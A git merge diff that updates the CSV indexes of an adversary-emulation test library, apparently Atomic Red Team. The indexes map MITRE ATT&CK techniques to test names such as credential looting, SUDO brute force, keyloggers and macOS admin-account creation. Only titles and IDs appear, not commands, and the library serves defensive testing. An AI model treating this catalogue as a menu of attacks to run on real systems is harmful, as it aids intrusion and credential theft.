Merge branch 'master' into gk-atomic-red-team-T1531-Account-Deletion

atomics/Indexes/Indexes-CSV/index.csv

@@ -453,8 +453,11 @@ defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer S
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -643,8 +646,11 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -931,8 +937,11 @@ persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1021,9 +1030,9 @@ credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,ae
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
-credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
-credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
-credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
+credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1350,7 +1359,8 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco
 discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
-discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
+discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
+discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -1510,8 +1520,11 @@ initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service A
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -173,8 +173,8 @@ credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to
 credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
 credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
-credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
-credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
+credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
+credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -64,6 +64,9 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
@@ -102,6 +105,9 @@ persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -129,6 +135,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
@@ -204,6 +213,9 @@ execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a5
 execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -330,8 +330,8 @@ defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,Wi
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -466,8 +466,8 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -665,8 +665,8 @@ persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify R
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -719,7 +719,7 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing R
 credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
-credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -951,7 +951,8 @@ discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the lo
 discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
-discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
+discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
+discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -1067,8 +1068,8 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
